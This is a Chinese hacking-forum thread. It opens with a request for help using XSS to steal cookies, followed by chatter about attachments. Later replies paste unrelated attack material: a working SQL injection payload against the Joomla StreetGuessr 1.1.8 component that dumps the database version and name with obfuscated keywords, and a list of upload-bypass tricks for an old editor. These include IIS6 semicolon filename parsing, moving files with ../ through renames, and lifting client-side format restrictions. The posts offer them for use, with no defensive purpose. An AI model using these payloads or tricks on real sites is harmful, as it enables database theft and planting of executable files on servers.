最近看过此主题的会员

返回列表 发帖

求教XSS

XSS听说可以欺骗cookies,但不知怎么利用它

 

您可能还想看的主题:

Multiple XSS in eShop for Wordpress

06.28_sina_XSS 新浪微薄 XSS Worm 攻击事件始末分析

Discuz 0day 多版本鸡肋存储型XSS漏洞

XSS - 攻擊與防禦手冊

精选XSS脚本代码!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:chenming123发表,本帖发表者chenming123符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者chenming123和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

自己先顶上,呵呵~!

TOP

1# chenming123
附件可以下载回去研究研究
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

我去T喽 每个帖子都T 坚决T

TOP

看来还是要好好研究一下才行,这门学问真高深。
知识储备不够啊。。

TOP

5# webmaster
    下载你的东东还要我钱呢

  {:3_48:}

TOP

Joomla! Component StreetGuessr Game v1.1.8 SQL注入漏洞
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-

# Etc..
# # # # #


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

dotnot编辑器字符过滤漏洞
没对一些字符过滤造成漏洞。 dotnot百科http://baike.baidu.com/view/1678378.htm
[/quote]
[quote]1. IIS6.0+03 直接传x.asp;x.jpg  也可建X.ASP文件夹
2. 如果上传目录没有执行权限,再次利用重命名功能可以,重命名名字加上 ../ 可以实现文件移动到上级目录,这样就可以突破上传目录没执行权限问题
3. 文件上传处有个高级设置,可以自定义上传格式,如果disable,可以自己用chrome把disable去掉,JS控制的。

新版本已经修复了,老版本好像没找到关于类的版本号说明,所以具体哪个版本不清楚-_-


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表